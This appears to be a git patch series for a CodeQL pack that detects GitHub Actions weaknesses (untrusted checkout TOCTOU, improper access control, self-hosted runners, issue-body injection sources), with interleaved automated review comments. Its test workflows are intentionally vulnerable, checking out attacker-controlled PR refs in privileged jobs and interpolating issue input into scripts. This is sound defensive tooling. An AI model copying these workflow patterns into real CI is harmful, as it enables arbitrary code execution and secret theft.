b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 94c6c49a34b0..898af1a699a9 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -14,7 +14,7 @@ string selfHostedRunnerRegexp() { */ predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | - job.getATriggerEvent() = + job.getATriggerEvent().getName() = ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and label = job.getARunsOnLabel() and not label.regexpMatch(selfHostedRunnerRegexp()) From a1efc78ac7d887e5b18ca8ef3bf40409cbf989ae Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 13:47:01 +0200 Subject: [PATCH 266/707] Refactor regexps --- .../actions/security/SelfHostedQuery.qll | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 898af1a699a9..e1279189c275 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,10 +1,17 @@ import actions import codeql.actions.dataflow.ExternalFlow -string selfHostedRunnerRegexp() { - // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 - result = - "(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$" +bindingset[runner] +predicate isGithubHostedRunner(string runner) { + // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images + runner + .toLowerCase() + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest)|(buildjet|warp)-[a-z0-9-]+)$") +} + +bindingset[runner] +predicate is3rdPartyHostedRunner(string runner) { + runner.toLowerCase().regexpMatch("^(buildjet|warp)-[a-z0-9-]+$") } /** @@ -15,9 +22,13 @@ string selfHostedRunnerRegexp() { predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | job.getATriggerEvent().getName() = - ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + [ + "issue_comment", "pull_request", "pull_request_review", "pull_request_review_comment", + "pull_request_target", "workflow_run" + ] and label = job.getARunsOnLabel() and - not label.regexpMatch(selfHostedRunnerRegexp()) + not isGithubHostedRunner(label) and + not is3rdPartyHostedRunner(label) ) } 
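Review bot: `isGithubHostedRunner` and `is3rdPartyHostedRunner` have no QLDoc, and the comment above the first reads "list of github hosted repos" while the link it cites is the runner-images list; suggest `/** Holds if `runner` is a label of a GitHub-hosted runner image (compared case-insensitively). */` and `// list of GitHub-hosted runner images: ...`. The version alternative `[0-9.]+` in the ubuntu and windows branches also accepts labels such as `ubuntu-.` or `windows-...`; `[0-9]+(\\.[0-9]+)?` is tighter and matches the real labels. In the second hunk the trigger list gains `issue_comment` and `workflow_run`; a one-line comment stating why those events are treated as untrusted triggers alongside the pull_request family would keep the next change to that list consistent with its intent.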
From cee0389d6eca33f41b51368601c4d06c0d99fd96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 15:33:28 +0200 Subject: [PATCH 267/707] Update SelfHostedQuery.qll MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index e1279189c275..3047ba35b064 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -6,7 +6,7 @@ predicate isGithubHostedRunner(string runner) { // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images runner .toLowerCase() - .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest)|(buildjet|warp)-[a-z0-9-]+)$") + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest))$") } bindingset[runner] From 60769f1671c3b65548eef36f684bf3dc67f3c540 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 16:26:53 +0200 Subject: [PATCH 268/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e68a4c67cc4f..acfc1c7e2102 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.22 +version: 0.0.23 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 465be503e7c3..efafbbb55bac 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.22 +version: 0.0.23 groups: - actions - queries From b4096e0201307a16775226f8d37f2aa0d79f9907 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 09:56:23 +0200 Subject: [PATCH 269/707] Refactor control checks --- .../security/UntrustedCheckoutQuery.qll | 45 +++++++++++++++---- 1 file changed, 37 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 10a45830324e..bf60c4a2f7f8 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -221,17 +221,46 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { } /** An If node that contains an actor, user or label check */ -class ControlCheck extends If { - ControlCheck() { +abstract class ControlCheck extends If { } + +class LabelControlCheck extends ControlCheck { + LabelControlCheck() { + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + // eg: github.event.label.name == 'safe to test' + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" + ], _, _) + ) + } +} + +class ActorControlCheck extends ControlCheck { + ActorControlCheck() { + // eg: contains(github.actor, 'dependabot') + // eg: github.triggering_actor != 'CI Agent' + // eg: github.event.pull_request.user.login == 'mybot' + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", + "\\bgithub\\.event\\.comment\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class AssociationControlCheck extends ControlCheck { + AssociationControlCheck() { + // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( Utils::normalizeExpr(this.getCondition()) .regexpFind([ - "\\bgithub\\.actor\\b", // actor - "\\bgithub\\.triggering_actor\\b", // actor - "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.labels\\b", // label - "\\bgithub\\.event\\.label\\.name\\b" // label + "\\bgithub\\.event\\.comment\\.author_association\\b", + "\\bgithub\\.event\\.issue\\.author_association\\b", + "\\bgithub\\.event\\.pull_request\\.author_association\\b", ], _, _) ) } From 7c295e011a31d92dff889e9ffefede2b6a940251 Mon Sep 17 00:00:00 2001 
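Review bot: All three ControlCheck subclasses classify an `If` on the mere presence of a context path in its normalized condition (`regexpFind`), so a condition that references the path without gating on it — the `github.triggering_actor != 'CI Agent'` example in ActorControlCheck's own comment, or a negated label test — is still counted as a control check; that is acceptable for a best-effort classifier but should be stated in QLDoc on `abstract class ControlCheck`, e.g. `/** An If whose condition references an actor, user, author-association or label context path. Presence only; the comparison itself is not evaluated. */`, and the three subclasses lack QLDoc entirely. The pattern lists in ActorControlCheck and AssociationControlCheck end with a trailing comma while LabelControlCheck's does not; worth making consistent. The class bodies of ActorControlCheck and AssociationControlCheck continue past the end of the hunk.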
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 10:19:27 +0200 Subject: [PATCH 270/707] TOCTOU queries and tests --- .../UntrustedCheckoutTOCTOUCritical.ql | 25 +++++++++++ .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 25 +++++++++++ .../CWE-367/.github/workflows/comment.yml | 41 +++++++++++++++++++ .../CWE-367/.github/workflows/deployment.yml | 31 ++++++++++++++ .../CWE-367/.github/workflows/label.yml | 17 ++++++++ .../UntrustedCheckoutTOCTOUCritical.expected | 2 + .../UntrustedCheckoutTOCTOUCritical.qlref | 1 + .../UntrustedCheckoutTOCTOUHigh.expected | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 1 + 9 files changed, 143 insertions(+) create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql new file mode 100644 index 000000000000..c5e12c0fccc1 --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
@@ -0,0 +1,25 @@ +/** + * @name Untrusted Checkout TOCTOU + * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/untrusted-checkout-toctou/critical + * @tags actions + * security + * external/cwe/cwe-367 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from ControlCheck check, MutableRefCheckoutStep checkout +where + // the mutable checkout step is protected by an access check + check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + // the checked-out code may lead to arbitrary code execution + checkout.getAFollowingStep() instanceof PoisonableStep +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql new file mode 100644 index 000000000000..b74c3389f9d9 --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
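Review bot: The alert message `"The checked-out code can be changed after the authorization check o step $@."` has a typo ("o" for "on"); the same string is in UntrustedCheckoutTOCTOUHigh.ql and ImproperAccessControl.ql in this series and is baked into their .expected files, so all three queries and the expected outputs need updating together. The `check = [checkout.getIf(), checkout.getEnclosingJob().getIf()]` conjunct only considers the step-level and job-level conditions; an authorization performed by an earlier step is not recognized, and that limitation belongs in the QLDoc `@description`, which at present does not say what separates this Critical variant from High (a following `PoisonableStep`, per the where clause). In the High variant the comment `there are no evidences` should read `there is no evidence`.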
@@ -0,0 +1,25 @@ +/** + * @name Untrusted Checkout TOCTOU + * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.3 + * @id actions/untrusted-checkout-toctou/high + * @tags actions + * security + * external/cwe/cwe-367 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from ControlCheck check, MutableRefCheckoutStep checkout +where + // the mutable checkout step is protected by an access check + check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + // there are no evidences that the checked-out code can lead to arbitrary code execution + not checkout.getAFollowingStep() instanceof PoisonableStep +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml new file mode 100644 index 000000000000..498b46090cbf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml 
@@ -0,0 +1,41 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: [ubuntu-latest] + steps: + + # test1 + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + # test2 + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml new file mode 100644 index 000000000000..f0a3035777c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml 
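Review bot: The fixture marks its two cases only as `# test1` and `# test2`, while the expected output reports test2 alone; a comment stating why would make the fixture self-explaining, e.g. `# test1: ref is a commit SHA resolved by the previous step - not reported` and `# test2: refs/pull/N/merge is a mutable ref - reported`. The `ref: "refs/pull/${{ github.event.number }}/merge"` value also uses `github.event.number`, which this workflow's `issue_comment` payload does not appear to provide; if the fixture is meant to mirror a real pattern, `github.event.issue.number` is the field the first step already uses.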
@@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml new file mode 100644 index 000000000000..1f04440d28bb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml @@ -0,0 +1,17 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/label_victim.yml +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected new file mode 100644 index 000000000000..e3a42b3265d8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
@@ -0,0 +1,2 @@ +| .github/workflows/comment.yml:37:9:41:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref new file mode 100644 index 000000000000..f924f8fe750c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref new file mode 100644 index 000000000000..6284c786b3ae --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql From 73fbd2311bc0eaded3f7855037c9249d252f6cf5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 10:20:04 +0200 Subject: [PATCH 271/707] Improper access check queries and tests --- .../Security/CWE-285/ImproperAccessControl.ql | 30 +++++++++++++++++++ .../CWE-285/.github/workflows/test1.yml | 20 +++++++++++++ .../CWE-285/.github/workflows/test2.yml | 20 +++++++++++++ .../CWE-285/ImproperAccessControl.expected | 1 + .../CWE-285/ImproperAccessControl.qlref | 2 ++ 5 files changed, 73 insertions(+) create mode 100644 ql/src/Security/CWE-285/ImproperAccessControl.ql create mode 100644 ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected create mode 100644 ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql new file mode 100644 index 000000000000..88ac3cee04db --- /dev/null +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql 
@@ -0,0 +1,30 @@ +/** + * @name Improper Access Control + * @description The access control mechanism is not properly implemented, allowing untrusted code to be executed in a privileged context. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/improper-access-control + * @tags actions + * security + * external/cwe/cwe-285 + */ + +import codeql.actions.security.UntrustedCheckoutQuery + +from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event +where + job = checkout.getEnclosingJob() and + job.isPrivileged() and + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" and + job.getAStep() = checkout and + ( + checkout.getIf() = check + or + checkout.getEnclosingJob().getIf() = check + ) +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml new file mode 100644 index 000000000000..48833460b44b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml new file mode 100644 index 000000000000..be6a6cf39395 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml 
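Review bot: The where clause encodes the whole finding in `event.getAnActivityType() = "synchronize"` paired with a `LabelControlCheck`, but nothing in the query says why that combination is the problem; a comment such as `// a label gate only holds if the workflow does not also run on synchronize: once the label is applied, later pushes re-run the job with the label still present` would let a reader verify the logic, and the `@description` could say the same instead of the generic text. If `getAnActivityType()` yields only explicitly listed `types:`, a `pull_request_target` trigger with no `types:` key (whose defaults include synchronize) would not be reported; worth confirming against the Event class and adding a test. `job.getAStep() = checkout` looks redundant with `job = checkout.getEnclosingJob()` two lines above, unless the two relations differ.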
@@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ labeled ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected new file mode 100644 index 000000000000..53dd12b9fb6e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -0,0 +1 @@ +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref new file mode 100644 index 000000000000..09a19f21e3cb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref @@ -0,0 +1,2 @@ +Security/CWE-285/ImproperAccessControl.ql + From 00f77ca9ecda1661a11a6fb3b3ed005549809445 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 11:36:43 +0200 Subject: [PATCH 272/707] Add missing source for peter-murray/issue-body-parser-action --- ...-murray_issue-body-parser-action.model.yml | 6 ++ .../CWE-094/.github/workflows/test3.yml | 61 +++++++++++++++++++ 2 files changed, 67 insertions(+) create mode 100644 ql/lib/ext/peter-murray_issue-body-parser-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml 
diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml new file mode 100644 index 000000000000..d156d7da6581 --- /dev/null +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml new file mode 100644 index 000000000000..40fe86529b0e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml 
@@ -0,0 +1,61 @@ +name: Approve or Deny Marketplace Action Request + +on: + issue_comment: + types: [created] + +jobs: + parse-issue: + runs-on: self-hosted + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + approve-or-deny-request: + runs-on: self-hosted + needs: parse-issue + if: needs.parse-issue.outputs.payload != 'NOT_FOUND' + steps: + - name: Lookup the latest release of ${{ fromJson(needs.parse-issue.outputs.payload).owner }}/${{ fromJson(needs.parse-issue.outputs.payload).repo }} + id: get_version + env: + OWNER: ${{ fromJson(needs.parse-issue.outputs.payload).owner }} + REPO: ${{ fromJson(needs.parse-issue.outputs.payload).repo }} + REQUEST_VERSION: ${{ fromJson(needs.parse-issue.outputs.payload).version }} + run: | + if [ $REQUEST_VERSION == 'latest' ]; then + echo "Finding latest release of $OWNER/$REPO..." 
+ export VERSION=`curl https://api.github.com/repos/$OWNER/$REPO/releases/latest | jq -r .name` + else + export VERSION=$REQUEST_VERSION + fi + echo "VERSION: $VERSION" + echo "version=$VERSION" >> $GITHUB_OUTPUT + - name: Check out scripts + uses: actions/checkout@v3 + - name: Setup Node + uses: actions/setup-node@v3 + with: + node-version: '14' + check-latest: true + - name: Install dependencies + run: | + cd .github/scripts + npm install + - name: Approve or deny request + uses: actions/github-script@main + env: + VERSION: ${{ steps.get_version.outputs.version }} + with: + debug: true + script: | + const options = { token: '${{ secrets.TOKEN }}', adminOpsOrg: '${{ vars.ADMIN_OPS_ORG }}', actionsApprovedOrg: '${{ vars.ACTIONS_APPROVED_ORG }}', actionsApproverTeam: '${{ vars.ACTIONS_APPROVERS_TEAM }}', baseUrl: '${{ github.api_url }}', version: process.env.VERSION }; + const payload = ${{ needs.parse-issue.outputs.payload }} + await require('./.github/scripts/approve-or-deny-request.js')({github, context, payload, options}); From 0473c3824f46c74b04dbf80ac762751a9c83f090 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 11:38:39 +0200 Subject: [PATCH 273/707] Treat branch-deploy action as a source of HEAD ref for untrusted checkouts --- .../actions/security/UntrustedCheckoutQuery.qll | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 10a45830324e..421af3be8abb 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -92,9 +92,15 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").regexpMatch(".*head_ref.*") and + ( + step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + // TODO: This should be read step of the head_sha or head_ref output vars + this.getArgument("ref").matches("%.head_ref%") + or + step.getCallee() = ["github/branch-deploy"] and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%.ref%") + ) and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) or From a0939bb0a3dfc8fbbccd7c055ac2715fabede49c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:29:45 +0200 Subject: [PATCH 274/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e68a4c67cc4f..acfc1c7e2102 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.22 +version: 0.0.23 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 465be503e7c3..efafbbb55bac 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.22 +version: 0.0.23 groups: - actions - queries From ca59423c8a47ba15afebfa5213a9566bdf962de3 Mon Sep 17 00:00:00 2001 
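Review bot: `this.getArgument("ref").matches("%.ref%")` in the new github/branch-deploy branch is a far looser filter than the `%.head_ref%` one above it: any `ref:` value containing `.ref`, such as `${{ github.ref }}`, satisfies it, and only the shared `DataFlow::hasLocalFlowExpr(step, ...)` conjunct ties the match to the branch-deploy step. Until the TODO (reading the step's `ref` output directly) is done, `matches("%outputs.ref%")` would keep the intent without matching unrelated context paths. `step.getCallee() = ["github/branch-deploy"]` is a one-element set literal; `= "github/branch-deploy"` reads the same as the two-element form above. The enclosing characteristic predicate begins before and ends after this hunk.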
